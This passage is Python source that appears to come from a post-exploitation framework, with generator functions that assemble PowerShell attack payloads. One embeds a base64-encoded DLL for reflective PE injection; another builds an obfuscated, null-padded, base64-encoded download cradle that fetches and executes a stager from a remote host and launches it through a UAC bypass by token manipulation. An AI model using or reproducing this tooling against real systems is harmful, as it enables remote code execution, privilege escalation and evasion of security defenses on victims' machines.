module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
script_end = "\nInvoke-ReflectivePEInjection"
# check if dllpath or PEUrl is set. Both are required params in their respective parameter sets.
if params["DllPath"] == "" and params["PEUrl"] == "":
return handle_error_message(
"[!] Please provide a PEUrl or DllPath")
for option, values in params.items():
if option.lower() != "agent":
if option.lower() == "dllpath":
if values != "":
try:
f = open(values, "rb")
dllbytes = f.read()
f.close()
base64bytes = base64.b64encode(dllbytes).decode(
"UTF-8")
script_end = (
"\n$PE = [Convert]::FromBase64String('" +
base64bytes + "')" + script_end)
script_end += " -PEBytes $PE"
except:
print(
helpers.color(
"[!] Error in reading/encoding dll: " +
str(values)))
elif option.lower() == "forceaslr":
if values.lower() == "true":
script_end += " -" + str(option)
elif values.lower() == "true":
script_end += " -" + str(option)
elif values and values != "":
script_end += " -" + str(option) + " " + str(values)
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# options
stager = params["Stager"]
host = params["Host"]
user_agent = params["UserAgent"]
port = params["Port"]
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
try:
blank_command = ""
powershell_command = ""
encoded_cradle = ""
cradle = (
"IEX \"(new-object net.webclient).downloadstring('%s:%s/%s')\"|IEX"
% (host, port, stager)
)
# Remove weird chars that could have been added by ISE
n = re.compile("(\xef|\xbb|\xbf)")
# loop through each character and insert null byte
for char in n.sub("", cradle):
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
encoded_cradle = base64.b64encode(powershell_command)
except Exception as e:
pass
script_end = 'Invoke-BypassUACTokenManipulation -Arguments "-w 1 -enc %s"' % (
encoded_cradle
)
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
